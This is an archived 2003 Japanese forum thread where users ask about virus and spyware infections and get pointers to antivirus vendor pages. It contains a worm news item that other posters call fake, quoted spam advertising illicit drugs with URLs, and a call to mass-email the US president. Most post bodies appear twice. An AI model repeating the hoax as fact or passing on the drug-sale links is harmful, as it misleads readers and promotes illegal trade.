424 :名無しさん@お腹いっぱい。:03/03/18 08:13
age
425 :名無しさん@お腹いっぱい。:03/03/18 09:06
W32.Whiter.Trojanと言うウイルスはウイルスチェックソフトに引っ掛からないらしいんですが
現在の最新版にアップデートした場合でもチェックに引っ掛からないんでしょうか?
現在の最新版にアップデートした場合でもチェックに引っ掛からないんでしょうか?
426 :名無しさん@お腹いっぱい。:03/03/18 09:37
>>425
検索したか?
http://www.google.com/search?q=%22W32.Whiter.Trojan%22&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2
少なくともノートンやウィルスバスターでは1年半ぐらい前から対応している。
http://www.symantec.com/region/jp/sarcj/data/w/w32.whiter.trojan.html
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_WHITER.D
検索したか?
http://www.google.com/search?q=%22W32.Whiter.Trojan%22&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2
少なくともノートンやウィルスバスターでは1年半ぐらい前から対応している。
http://www.symantec.com/region/jp/sarcj/data/w/w32.whiter.trojan.html
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_WHITER.D
427 :名無しさん@お腹いっぱい。:03/03/18 09:44
WinnyやMXに起因する問題は、ダウソ板http://tmp.2ch.net/download/で。
WinnyやMXは自己責任でやってくださいです。
WinnyやMXは自己責任でやってくださいです。
428 :名無しさん@お腹いっぱい。:03/03/18 09:49
429 :名無しさん@お腹いっぱい。:03/03/18 10:40
Macro.srcについて教えてください
ググったけど、ワームだということしか分かりませんでした
ググったけど、ワームだということしか分かりませんでした
430 :名無しさん@お腹いっぱい。:03/03/18 10:59
>>429
こんなにいっぱいHitするのに…
http://www.google.com/search?q=%22Macro.src%22&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2
具体的に何が知りたいのか書かないと答えもらいにくいよ。
こんなにいっぱいHitするのに…
http://www.google.com/search?q=%22Macro.src%22&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2
具体的に何が知りたいのか書かないと答えもらいにくいよ。
431 :名無しさん@お腹いっぱい。:03/03/18 11:17
432 :名無しさん@お腹いっぱい。:03/03/18 11:55
プロ(・∀・)プント!!
433 :名無しさん@お腹いっぱい。:03/03/18 14:26
age
434 :名無しさん@お腹いっぱい。:03/03/18 15:34
meを使っています。
最近エラーが頻繁に発生します。
ウィルスに感染しているのかも、と思い
トレンドマイクロのウイルスバスターオンラインスキャンで
チェックしたんですが、チェック中にもエラーがでます。
これは一体何なんでしょう?
最近エラーが頻繁に発生します。
ウィルスに感染しているのかも、と思い
トレンドマイクロのウイルスバスターオンラインスキャンで
チェックしたんですが、チェック中にもエラーがでます。
これは一体何なんでしょう?
435 :名無しさん@お腹いっぱい。:03/03/18 16:15
436 :名無しさん@お腹いっぱい。:03/03/18 17:26
わかりました
ありがとうございました
ありがとうございました
437 :名無しさん@お腹いっぱい。:03/03/18 19:12
age
438 :名無しさん@お腹いっぱい。:03/03/18 21:48
いきなり「○○から**.**.**.**(IPアドレス?)にインスタントメッセージがとどきました」
とかいうメッセージがでたんですけどまったく心当たりがありませぬ。
MSNメッセンジャーとか何も導入してないのに・・・
こんな風にしてウイルスがきたりしませんか?
とかいうメッセージがでたんですけどまったく心当たりがありませぬ。
MSNメッセンジャーとか何も導入してないのに・・・
こんな風にしてウイルスがきたりしませんか?
439 :名無しさん@お腹いっぱい。:03/03/18 21:50
age
440 :cheshire-cat ◆PhCATJR.v6 :03/03/18 22:11
441 :名無しさん@お腹いっぱい。:03/03/18 22:56
Sendmailの脆弱性をついて感染、
他サーバに感染行動起こすウイルスて
いまなんか流行ってたか?
他サーバに感染行動起こすウイルスて
いまなんか流行ってたか?
442 :名無しさん@お腹いっぱい。:03/03/19 07:14
443 :名無しさん@お腹いっぱい。:03/03/19 10:37
>>442
この板では鑑定はしません。ラウンジの鑑定スレでどうぞ。
勇気が無くて見られない画像解説スレ part315
http://ex.2ch.net/test/read.cgi/entrance/1047975471/l50
ウィルス感染が気になるならウィルススキャン汁。
ブラクラチェッカも使いましょう。>>402-403
この板では鑑定はしません。ラウンジの鑑定スレでどうぞ。
勇気が無くて見られない画像解説スレ part315
http://ex.2ch.net/test/read.cgi/entrance/1047975471/l50
ウィルス感染が気になるならウィルススキャン汁。
ブラクラチェッカも使いましょう。>>402-403
444 :名無しさん@お腹いっぱい。:03/03/19 11:18
Code Redの亜種に見る,マイクロソフトの情報公開への取り組み
「TechNetセキュリティセンター」だけではなく「マイクロソフト セキュリティ」なども要チェック
今週のSecurity Check [Windows編] (第90回,2003年3月19日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030318/1/
「TechNetセキュリティセンター」だけではなく「マイクロソフト セキュリティ」なども要チェック
今週のSecurity Check [Windows編] (第90回,2003年3月19日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030318/1/
445 :名無しさん@お腹いっぱい。:03/03/19 11:48
1991年にイラク軍がクエートに侵攻した直後、クエートの難民と称する少女が米国下院議会で泣きながら、次のような証言をしました。
「私はクエートから脱出してきました。クエートではイラク兵が赤ちゃんを保育器から取り出して殺したのを見ました。」
この様子はアメリカのTVから世界中に発信され、イラク軍は世界中から非難を浴びる事になりました。
しかし、この少女は当時クエートには居らず、実は駐米クエート大使の娘で、この証言はアメリカの大手広告代理店が仕事として請負い、
事前に何回もリハーサルをさせたうえで少女にさせた嘘の証言である事が後に判明しました。
その後アメリカが参戦しブッシュ元大統領の支持率は90%近くまで上がりました。
「私はクエートから脱出してきました。クエートではイラク兵が赤ちゃんを保育器から取り出して殺したのを見ました。」
この様子はアメリカのTVから世界中に発信され、イラク軍は世界中から非難を浴びる事になりました。
しかし、この少女は当時クエートには居らず、実は駐米クエート大使の娘で、この証言はアメリカの大手広告代理店が仕事として請負い、
事前に何回もリハーサルをさせたうえで少女にさせた嘘の証言である事が後に判明しました。
その後アメリカが参戦しブッシュ元大統領の支持率は90%近くまで上がりました。
446 :名無しさん@お腹いっぱい。:03/03/19 16:33
age
447 :c:03/03/19 16:33
448 :名無しさん@お腹いっぱい。:03/03/19 21:05
age
450 :名無しさん@お腹いっぱい。:03/03/20 00:55
どちらを買おうか迷っています。
どちらが良いか教えて頂けないでしょうか。
よろしくお願いします。
(OSはWin MEです。)
どちらが良いか教えて頂けないでしょうか。
よろしくお願いします。
(OSはWin MEです。)
451 :名無しさん@お腹いっぱい。:03/03/20 00:59
452 :名無しさん@お腹いっぱい。:03/03/20 01:00
453 :名無しさん@お腹いっぱい。:03/03/20 01:03
454 :名無しさん@お腹いっぱい。:03/03/20 01:10
455 :「メールで戦争反対を訴えよう」:03/03/20 01:37
「メールで戦争反対を訴えよう」
悲しい事に望まれない戦争が始まろうとしている。
そこで私にもできる反戦活動はないかと考え実行することにした。
私一人では意味の無いので多くの人に協力をして欲しい。
内容は以下の通りである。
下記にあるアメリカ合衆国大統領宛に皆で平和への願いのメールをしよう。
アメリカ合衆国大統領
[email protected]
<平和への願いに少しでも耳を傾けて貰うために>
・何度も何度もメールで訴えよう。
・訴えることが重要だ、一言だって構わない。
・言語は自分の国の言葉でも構わない。訴えないよりも良いからだ。
・文章だけでなくて、画像、音声、映像等を添付するのも良いだろう。
<より多くの人の平和への願いを送るために>
この文を可能な限り広めて欲しい、
多くの言葉に翻訳して、
多くの人々の平和への願いを彼らに直に伝えよう。
<最後に>
多くの人の多くの平和への願いが集まれば大きな力となり
それを無視できないものとなるだろう・・・
世界が早く再び平和な状態に戻る事を祈って
平和が訪れるまで繰り返しメールで平和への願いを送ろうではないか。
悲しい事に望まれない戦争が始まろうとしている。
そこで私にもできる反戦活動はないかと考え実行することにした。
私一人では意味の無いので多くの人に協力をして欲しい。
内容は以下の通りである。
下記にあるアメリカ合衆国大統領宛に皆で平和への願いのメールをしよう。
アメリカ合衆国大統領
[email protected]
<平和への願いに少しでも耳を傾けて貰うために>
・何度も何度もメールで訴えよう。
・訴えることが重要だ、一言だって構わない。
・言語は自分の国の言葉でも構わない。訴えないよりも良いからだ。
・文章だけでなくて、画像、音声、映像等を添付するのも良いだろう。
<より多くの人の平和への願いを送るために>
この文を可能な限り広めて欲しい、
多くの言葉に翻訳して、
多くの人々の平和への願いを彼らに直に伝えよう。
<最後に>
多くの人の多くの平和への願いが集まれば大きな力となり
それを無視できないものとなるだろう・・・
世界が早く再び平和な状態に戻る事を祈って
平和が訪れるまで繰り返しメールで平和への願いを送ろうではないか。
456 :名無しさん@お腹いっぱい。:03/03/20 02:57
ここ1週間位、「mIRC」がどうこういう窓が起動時に出ます。
オンラインノートンしたら、3つウィルス発見。
除去したはずなのに、まだ「mIRC」が出ます。
何だろうこれは??
オンラインノートンしたら、3つウィルス発見。
除去したはずなのに、まだ「mIRC」が出ます。
何だろうこれは??
457 :名無しさん@お腹いっぱい。:03/03/20 04:08
OS、ウィルス名くらい書け
つか、除去した”はず”って何よ、やってから調べてないのかい?
つか、除去した”はず”って何よ、やってから調べてないのかい?
458 :名無しさん@お腹いっぱい。:03/03/20 04:24
>>457
おーえすwin2000です。
ウィルスは、、
次のウィルスに感染しています: VBS.LoveLetter.A
次のウィルスに感染しています:IRCTrojan
次のウィルスに感染しています:IRC.Mimic
の3つでした。
感染したファイル3つとも削除したんですが、、「mIRC」がどうこうって出まつ…
(3/12定義ファイルでやったんですが、ダメです。)
さっきウィルス定義アップデートしたんで、再度やってみますが…
「mIRC」って何でしょうか…
おーえすwin2000です。
ウィルスは、、
次のウィルスに感染しています: VBS.LoveLetter.A
次のウィルスに感染しています:IRCTrojan
次のウィルスに感染しています:IRC.Mimic
の3つでした。
感染したファイル3つとも削除したんですが、、「mIRC」がどうこうって出まつ…
(3/12定義ファイルでやったんですが、ダメです。)
さっきウィルス定義アップデートしたんで、再度やってみますが…
「mIRC」って何でしょうか…
459 : :03/03/20 04:27
,.´ / Vヽヽ
! i iノノリ)) 〉
i l l.´ヮ`ノリ <先生!こんなのがありました!
l く/_只ヽ
| ̄ ̄ ̄ ̄ ̄|
http://saitama.gasuki.com/aomori/
! i iノノリ)) 〉
i l l.´ヮ`ノリ <先生!こんなのがありました!
l く/_只ヽ
| ̄ ̄ ̄ ̄ ̄|
http://saitama.gasuki.com/aomori/
460 :名無しさん@お腹いっぱい。:03/03/20 06:46
【反米英日】新ワーム"Peace Keeper"【サイバーテロ】
http://pc.2ch.net/test/read.cgi/sec/1017309416/
■新型ワーム「Peace Keeper」にサーバ10万台以上が感染
10万台以上のサーバが、新型ワームに感染していることが判明した。
この新型インターネットワームは、Microsoftのソフトウェアの
セキュリティホールを悪用してサーバーに侵入する。
セキュリティ会社の Security Focus が19日に明らかにした。
このワームは、ブッシュ米大統領がフセイン・イラク大統領に突きつけた最後通告の
期限が切れる19日午後8時(米東部時間)に、米英日のサーバーに向け
「Slammer」の10倍以上にあたる膨大な量のパケットを送信する。
そしてこのトラフィックの増加によって、結果的にシステムをサービス拒否状態に
陥らせてしまう。
ただし、19日の開戦を回避した場合はこのワームは発症しない。(WIRED NEWS)
http://pc.2ch.net/test/read.cgi/sec/1017309416/
■新型ワーム「Peace Keeper」にサーバ10万台以上が感染
10万台以上のサーバが、新型ワームに感染していることが判明した。
この新型インターネットワームは、Microsoftのソフトウェアの
セキュリティホールを悪用してサーバーに侵入する。
セキュリティ会社の Security Focus が19日に明らかにした。
このワームは、ブッシュ米大統領がフセイン・イラク大統領に突きつけた最後通告の
期限が切れる19日午後8時(米東部時間)に、米英日のサーバーに向け
「Slammer」の10倍以上にあたる膨大な量のパケットを送信する。
そしてこのトラフィックの増加によって、結果的にシステムをサービス拒否状態に
陥らせてしまう。
ただし、19日の開戦を回避した場合はこのワームは発症しない。(WIRED NEWS)
461 :名無しさん@お腹いっぱい。:03/03/20 07:33
462 :名無しさん@お腹いっぱい。:03/03/20 08:44
このスレでネタはやめれage
463 :名無しさん@お腹いっぱい。:03/03/20 10:00
アホの願望は見てて哀れだねえ
464 :名無しさん@お腹いっぱい。:03/03/20 14:51
age
465 :名無しさん@お腹いっぱい。:03/03/20 15:24
Lop.comってスパイウェア知ってますか?
一回削除して、しばらく消えていたんですがこのごろまたでてきました、、、
IEを開く度にAd−awareとSpybot両方使って削除して、開いた時
ヤフーになるように設定してるんだけど電源を切って
またPCを起動してIEを開くたびLopが復活してるんです。。。
削除してもそのときはなくなるんですが、またきどうするたびに出てきます。
どうしたらいいんでしょうか?
一回削除して、しばらく消えていたんですがこのごろまたでてきました、、、
IEを開く度にAd−awareとSpybot両方使って削除して、開いた時
ヤフーになるように設定してるんだけど電源を切って
またPCを起動してIEを開くたびLopが復活してるんです。。。
削除してもそのときはなくなるんですが、またきどうするたびに出てきます。
どうしたらいいんでしょうか?
466 :名無しさん@お腹いっぱい。:03/03/20 15:51
米英の数百のサイトがクラックされたらしいけどなんか情報ない?
467 :名無しさん@お腹いっぱい。:03/03/20 15:55
>>466
されてない
されてない
468 :名無しさん@お腹いっぱい。:03/03/20 16:00
>>467
おまえが知らないだけだ
おまえが知らないだけだ
469 :名無しさん@お腹いっぱい。:03/03/20 16:04
>>466
逆にどこでそれを知ったんだ?
逆にどこでそれを知ったんだ?
470 :名無しさん@お腹いっぱい。:03/03/20 16:13
>>469
セキュリティホールmemo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/
あと、jaipa(社団法人日本インターネットプロバイダー協会)からのメール
-----------------------------------------------------------
> JAIPA事務局 **です。
> いつもお世話になります。
>
>
> 総務省より、至急の調査依頼がありました。
>
> イラクに対する攻撃が始まった関係からか、未確認ですが、
> 他国で数百あまりのWebサイトが改ざんされたという情報があるようです。
>
> つきましては、
>
> 1.会員の皆様の現時点の状況をお知らせください。
>
> 2.また、今後これに類するような状況が発生した場合には、
> 速やかに当協会(***@******)までご連絡ください。
>
> お忙しいところ恐れ入りますが、よろしくお願いいたします。
>
-----------------------------------------------------------
セキュリティホールmemo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/
あと、jaipa(社団法人日本インターネットプロバイダー協会)からのメール
-----------------------------------------------------------
> JAIPA事務局 **です。
> いつもお世話になります。
>
>
> 総務省より、至急の調査依頼がありました。
>
> イラクに対する攻撃が始まった関係からか、未確認ですが、
> 他国で数百あまりのWebサイトが改ざんされたという情報があるようです。
>
> つきましては、
>
> 1.会員の皆様の現時点の状況をお知らせください。
>
> 2.また、今後これに類するような状況が発生した場合には、
> 速やかに当協会(***@******)までご連絡ください。
>
> お忙しいところ恐れ入りますが、よろしくお願いいたします。
>
-----------------------------------------------------------
471 :名無しさん@お腹いっぱい。:03/03/20 17:00
ここはウイルス質問情報スレだから、改ざんは別スレでやってくれ。
472 :名無しさん@お腹いっぱい。:03/03/20 17:09
そういう電波混じりのいい加減な情報はどうでもいい
473 :かおり:03/03/20 18:40
E-Z-LIVEの削除の仕方を教えてください。
本当に困ってます…(涙)
旦那が一人で夫婦共同で使っているPCに取り込んでしまったらしく、本人はもう
反省しているのですが、二人して初心者なもんで削除したくてもできないし…。
PCを再起動したらHPがエロサイトになってしまうし…。初期化するしかないので
しょうか…?
お願いです!!!初期化せずに消せる方法があるのなら教えてください!!!
以前のスレッドで似た内容のものがあったのですが削除方法がわからなかったの
で書き込ませていただきました。
本当に困ってます…(涙)
旦那が一人で夫婦共同で使っているPCに取り込んでしまったらしく、本人はもう
反省しているのですが、二人して初心者なもんで削除したくてもできないし…。
PCを再起動したらHPがエロサイトになってしまうし…。初期化するしかないので
しょうか…?
お願いです!!!初期化せずに消せる方法があるのなら教えてください!!!
以前のスレッドで似た内容のものがあったのですが削除方法がわからなかったの
で書き込ませていただきました。
474 :名無しさん@お腹いっぱい。:03/03/20 18:43
475 :かおり:03/03/20 18:55
しました…。
って言うか削除依頼できたんでしょうか…。
って言うか削除依頼できたんでしょうか…。
476 :かおり:03/03/20 19:09
誰か教えてくださぁい
478 :名無しさん@お腹いっぱい。:03/03/20 19:57
>>473
質問するときはOS等環境を書かないと誰も答えられない。
http://www.geocities.co.jp/SiliconValley-SanJose/3220/startpage.htm
http://www.i-honky.com/BBS/BBS.asp?db=h04&id=804
質問するときはOS等環境を書かないと誰も答えられない。
http://www.geocities.co.jp/SiliconValley-SanJose/3220/startpage.htm
http://www.i-honky.com/BBS/BBS.asp?db=h04&id=804
479 :名無しさん@お腹いっぱい。:03/03/20 22:54
>>465ですが、誰かお願いします・・・
480 :名無しさん@お腹いっぱい。:03/03/20 23:07
481 :名無しさん@お腹いっぱい。:03/03/20 23:16
483 :名無しさん@お腹いっぱい。:03/03/21 11:57
age
484 :名無しさん@お腹いっぱい。:03/03/21 15:01
ノートンのサイトでウィルスチェックやったら
「VBS.Network.E」 というものが検出されました。
削除は容易なようなので、それほど心配してないのですが
感染元のファイルがこのセキュ板の閲覧画面だったので…
どういう事なんでしょう(汗)
OSはWIN98 この板は3月20日(昨日)に初めて訪れて、
その日に感染したようです
ファイル名は sec[1].htm sec[2].htm です
「VBS.Network.E」 というものが検出されました。
削除は容易なようなので、それほど心配してないのですが
感染元のファイルがこのセキュ板の閲覧画面だったので…
どういう事なんでしょう(汗)
OSはWIN98 この板は3月20日(昨日)に初めて訪れて、
その日に感染したようです
ファイル名は sec[1].htm sec[2].htm です
485 :名無しさん@お腹いっぱい。:03/03/21 15:29
486 :484:03/03/21 15:33
487 :v:03/03/21 15:38
488 :名無しさん@お腹いっぱい。:03/03/21 17:23
こんなメールきたよ
[email protected]
サ イ ケ デ リ ッ ク 天 国 〜 ゆ ら ゆ ら 〜
脳 味 噌 は 多 幸 感 で 満 ち 溢 れ ・・・。
http://yaku3.netfirms.com/
http://my.kid-d.com/yaku0/
http://members.fortunecity.co.uk/smoker/
【密売】【密売】【密売】【密売】【密売】【密売】
合 法 ド ラ ッ グ な ん か 、 も う
た る く て や っ て ら ん な い で し ょ
http://www.smoker.9cy.com/
http://yaku.ciudad.org/
http://book-i.net/yaku0/
【密売】【密売】【密売】【密売】【密売】【密売】
[email protected]
サ イ ケ デ リ ッ ク 天 国 〜 ゆ ら ゆ ら 〜
脳 味 噌 は 多 幸 感 で 満 ち 溢 れ ・・・。
http://yaku3.netfirms.com/
http://my.kid-d.com/yaku0/
http://members.fortunecity.co.uk/smoker/
【密売】【密売】【密売】【密売】【密売】【密売】
合 法 ド ラ ッ グ な ん か 、 も う
た る く て や っ て ら ん な い で し ょ
http://www.smoker.9cy.com/
http://yaku.ciudad.org/
http://book-i.net/yaku0/
【密売】【密売】【密売】【密売】【密売】【密売】
489 :名無しさん@お腹いっぱい。:03/03/21 17:39
>>488
うちにも来た。Shift-JISで。
うちにも来た。Shift-JISで。
490 :名無しさん@お腹いっぱい。:03/03/21 17:44
>>489
買ってみたよ
買ってみたよ
491 :名無しさん@お腹いっぱい。:03/03/21 17:45
>>490
業者かよ氏ね
業者かよ氏ね
492 :名無しさん@お腹いっぱい。:03/03/21 20:47
ウイルスをばら撒いてるのって、
ワクチンソフトの関係者だったりして。
ワクチンソフトの関係者だったりして。
493 :名無しさん@お腹いっぱい。:03/03/21 21:01
基本的なハッキングのしかたを教えてください。
494 :493はここ逝こうね:03/03/21 21:32
495 :名無しさん@お腹いっぱい。:03/03/22 00:37
>>492
散々言われてきていることだが
散々言われてきていることだが
496 :名無しさん@お腹いっぱい。:03/03/22 15:14
http://pc2.2ch.net/test/read.cgi/win/1048235672/l50
ここから誘導されてきました。
XPsp1を使用し、アップデートは頻繁におこなっています。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELWIN.D
このTROJ DELWIN というウィルスを実行してしまったんですが、
実行後すぐにエラーが出て、その実行ファイルは停止したようです。
Sytemフォルダなどを調べて見ましたが、ファイルは普通に残っているようです。
ということは、XPはこのウィルスを弾いてくれたのでしょうか?
心配で再起動もできません。。
ここから誘導されてきました。
XPsp1を使用し、アップデートは頻繁におこなっています。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELWIN.D
このTROJ DELWIN というウィルスを実行してしまったんですが、
実行後すぐにエラーが出て、その実行ファイルは停止したようです。
Sytemフォルダなどを調べて見ましたが、ファイルは普通に残っているようです。
ということは、XPはこのウィルスを弾いてくれたのでしょうか?
心配で再起動もできません。。
497 :名無しさん@お腹いっぱい。:03/03/22 22:27
おそらくアンチウィルスソフトの誤作動だと思うのですが(そう思いたい)
不思議な現象が起こってて不気味なので教えてください。
ネット接続中、数分〜数時間何もしてない時間があったんです。
すると突然プチンという音と共に、ウィルス検出画面に切り替わり
VHPウィルス(?)が検出されたと出ました。
そのときは再起動して放っておいたのですが(エラーチェックがあった)
また、同じ状況で検出されてしまいました。。
原因のわかる方はいませんか?
ソフトはAntiVir Personal Edition(AVGuard)です。
不思議な現象が起こってて不気味なので教えてください。
ネット接続中、数分〜数時間何もしてない時間があったんです。
すると突然プチンという音と共に、ウィルス検出画面に切り替わり
VHPウィルス(?)が検出されたと出ました。
そのときは再起動して放っておいたのですが(エラーチェックがあった)
また、同じ状況で検出されてしまいました。。
原因のわかる方はいませんか?
ソフトはAntiVir Personal Edition(AVGuard)です。
498 :名無しさん@お腹いっぱい。:03/03/22 22:32
どうやらRedlof.aに感染したようなんですが、どうしたらいいでしょう?
499 :名無しさん@お腹いっぱい。:03/03/22 22:49
書き忘れてました。Windows98です。
500 :名無しさん@お腹いっぱい。:03/03/22 22:59
501 :名無しさん@お腹いっぱい。:03/03/23 01:14
502 :名無しさん@お腹いっぱい。:03/03/23 03:44
>>501はマルチ
放置よろ
放置よろ
503 :名無しさん@お腹いっぱい。:03/03/23 12:02
_____
/::::::::::::::::::::::::::\
/::::::::::::::::::::::::::::::::::::::\
|:::::::::::::::::|_|_|_|_|
|;;;;;;;;;;ノ \,, ,,/ ヽ
|::( 6 ー─◎─◎ ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|ノ (∵∴ ( o o)∴) / >>501はマルチ
/| < ∵ 3 ∵> <
::::::\ ヽ ノ\ \ 放置よろ
:::::::::::::\_____ノ:::::::::::\ \___________
/::::::::::::::::::::::::::\
/::::::::::::::::::::::::::::::::::::::\
|:::::::::::::::::|_|_|_|_|
|;;;;;;;;;;ノ \,, ,,/ ヽ
|::( 6 ー─◎─◎ ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|ノ (∵∴ ( o o)∴) / >>501はマルチ
/| < ∵ 3 ∵> <
::::::\ ヽ ノ\ \ 放置よろ
:::::::::::::\_____ノ:::::::::::\ \___________
504 :名無しさん@お腹いっぱい。:03/03/23 13:21
_____
/::::::::::::::::::::::::::\
/::::::::::::::::::::::::::::::::::::::\
|:::::::::::::::::|_|_|_|_|
|;;;;;;;;;;ノ \,, ,,/ ヽ
|::( 6 ー─◎─◎ ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|ノ (∵∴ ( o o)∴) / >>ムホッ ムホッ
/| < ∵ 3 ∵> <マルチハケーン!放置しる!
::::::\ ヽ ノ\ \ ヴァカ共には参るゼまったく
:::::::::::::\_____ノ:::::::::::\ \___________
/::::::::::::::::::::::::::\
/::::::::::::::::::::::::::::::::::::::\
|:::::::::::::::::|_|_|_|_|
|;;;;;;;;;;ノ \,, ,,/ ヽ
|::( 6 ー─◎─◎ ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|ノ (∵∴ ( o o)∴) / >>ムホッ ムホッ
/| < ∵ 3 ∵> <マルチハケーン!放置しる!
::::::\ ヽ ノ\ \ ヴァカ共には参るゼまったく
:::::::::::::\_____ノ:::::::::::\ \___________
505 :名無しさん@お腹いっぱい。:03/03/23 15:26
age
506 :名無しさん@お腹いっぱい。:03/03/23 22:34
age
507 :名無しさん@お腹いっぱい。:03/03/23 23:21
∧_∧∩ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
( ´∀`)/<先生!こんなのがありました!
_ / / / \___________
\⊂ノ ̄ ̄ ̄ ̄\
||\ \
||\|| ̄ ̄ ̄ ̄ ̄||
|| || ̄ ̄ ̄ ̄ ̄||
http://saitama.gasuki.com/saitama/
( ´∀`)/<先生!こんなのがありました!
_ / / / \___________
\⊂ノ ̄ ̄ ̄ ̄\
||\ \
||\|| ̄ ̄ ̄ ̄ ̄||
|| || ̄ ̄ ̄ ̄ ̄||
http://saitama.gasuki.com/saitama/
508 :名無しさん@お腹いっぱい。:03/03/23 23:25
_____
/::::::::::::::::::::::::::\
/::::::::::::::::::::::::::::::::::::::\
|:::::::::::::::::|_|_|_|_|
|;;;;;;;;;;ノ \,, ,,/ ヽ
|::( 6 ー─◎─◎ ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|ノ (∵∴ ( o o)∴) /このウィルスは何で
/| < ∵ 3 ∵> < どうやって駆除すればいいのですか?
::::::\ ヽ ノ\ \ おしえろよクズども
:::::::::::::\_____ノ:::::::::::\ \___________
/::::::::::::::::::::::::::\
/::::::::::::::::::::::::::::::::::::::\
|:::::::::::::::::|_|_|_|_|
|;;;;;;;;;;ノ \,, ,,/ ヽ
|::( 6 ー─◎─◎ ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|ノ (∵∴ ( o o)∴) /このウィルスは何で
/| < ∵ 3 ∵> < どうやって駆除すればいいのですか?
::::::\ ヽ ノ\ \ おしえろよクズども
:::::::::::::\_____ノ:::::::::::\ \___________
509 :名無しさん@お腹いっぱい。:03/03/24 00:09
>>508
マルチ厨必死だな。もうちょっと大人になりましょうね
マルチ厨必死だな。もうちょっと大人になりましょうね
510 :名無しさん@お腹いっぱい。:03/03/24 00:49
511 :名無しさん@お腹いっぱい。:03/03/24 00:51
ていうかマルチ厨ってどっち?
「マルチした奴は懲罰的に無視」って思ってる方でしょ?
「マルチした奴は懲罰的に無視」って思ってる方でしょ?
512 :名無しさん@お腹いっぱい。:03/03/24 02:32
初心者板、もしくは厨房板へどーぞ
513 :名無しさん@お腹いっぱい。:03/03/24 03:48
荒れてると思ったらずっと前から荒れてたのね。よく9まで続いたな。
514 :名無しさん@お腹いっぱい。:03/03/24 11:18
>>473
遅れすだけど、どうせ、こいつはネカマだな。春休み入りたての厨房が家族のパソコンでエロサイト巡回したんだろな。
俺も昔、その罠にはまって、リア厨の俺はホントあせったよ。
できるインターネット呼んで直ったけど・・・。
しっかり、ダイヤルアップ先が変わってて2万円とられてたんだよね・・・・。
なつかしい・・。
遅れすだけど、どうせ、こいつはネカマだな。春休み入りたての厨房が家族のパソコンでエロサイト巡回したんだろな。
俺も昔、その罠にはまって、リア厨の俺はホントあせったよ。
できるインターネット呼んで直ったけど・・・。
しっかり、ダイヤルアップ先が変わってて2万円とられてたんだよね・・・・。
なつかしい・・。
515 :名無しさん@お腹いっぱい。:03/03/24 11:26
次の質問・情報どうぞ。
↓ ↓ ↓
516 :名無しさん@お腹いっぱい。:03/03/24 13:07
http://www.kogalu.com/sou/logon/omanko.htmってところに好奇心ではいったら、
ホームが強制的に↑になっちゃうんですが、だれか直し方わかりますか?
ホームが強制的に↑になっちゃうんですが、だれか直し方わかりますか?
517 :名無しさん@お腹いっぱい。:03/03/24 13:08
518 :名無しさん@お腹いっぱい。:03/03/24 13:54
>>517さんありがとうございます!
519 :名無しさん@お腹いっぱい。:03/03/24 14:38
Norton AntiVirusとNorton Internet Securityって何が違うんだろう・・・・
520 :名無しさん@お腹いっぱい。:03/03/24 14:39
あげてしもたスマソ(-_-; )ゞ
521 :名無しさん@お腹いっぱい。:03/03/24 14:41
あぅあ・・・しかも誤爆。逝ってきます
522 :名無しさん@お腹いっぱい。:03/03/24 16:49
1月くらいに韓国でネット障害とか起こしたウイルス
ってなんて名前だっけ?
ってなんて名前だっけ?
523 :名無しさん@お腹いっぱい。:03/03/24 17:09
524 :名無しさん@お腹いっぱい。:03/03/24 22:39
age
525 :名無しさん@お腹いっぱい。:03/03/24 23:23
same
526 :名無しさん@お腹いっぱい。:03/03/25 02:39
○○○○ こんな電波はありませんか? ○○○○
荒らしなどのコピペで、厨房、工房、消防、
このような人たちをコピペで煽りを行えるコピペは無いでしょうか。
出来れば制限時間内に5レスくらい返ってくる、みたいな含蓄のあるもの。
出来ればレベルの高いものをお願いします。
荒らしと書きましたが、形式は全く問わないです。
著作権、版権も問わないです。
お願いします。
荒らしなどのコピペで、厨房、工房、消防、
このような人たちをコピペで煽りを行えるコピペは無いでしょうか。
出来れば制限時間内に5レスくらい返ってくる、みたいな含蓄のあるもの。
出来ればレベルの高いものをお願いします。
荒らしと書きましたが、形式は全く問わないです。
著作権、版権も問わないです。
お願いします。
527 :名無しさん@お腹いっぱい。:03/03/25 03:03
>>526
どっか逝け。
どっか逝け。
528 :名無しさん@お腹いっぱい。:03/03/25 06:55
>>526
ショレダ!
ショレダ!
529 :名無しさん@お腹いっぱい。:03/03/25 14:44
age
530 :名無しさん@お腹いっぱい。:03/03/25 17:23
JS_KOWAIAなるものに感染しました。
一応駆除しましたが、なにか影響があるでしょうか?
どうか教えてください。
一応駆除しましたが、なにか影響があるでしょうか?
どうか教えてください。
531 :名無しさん@お腹いっぱい。:03/03/25 17:30
532 :名無しさん@お腹いっぱい。:03/03/25 17:30
それがデータベースになかったんです
533 :名無しさん@お腹いっぱい。:03/03/25 17:37
じゃ、どうしてJS_KOWAIAだと分かるのか。
何で検出したのか、感染経路は、OS等環境は?
情報の小出しは(ry
何で検出したのか、感染経路は、OS等環境は?
情報の小出しは(ry
534 :名無しさん@お腹いっぱい。:03/03/25 18:07
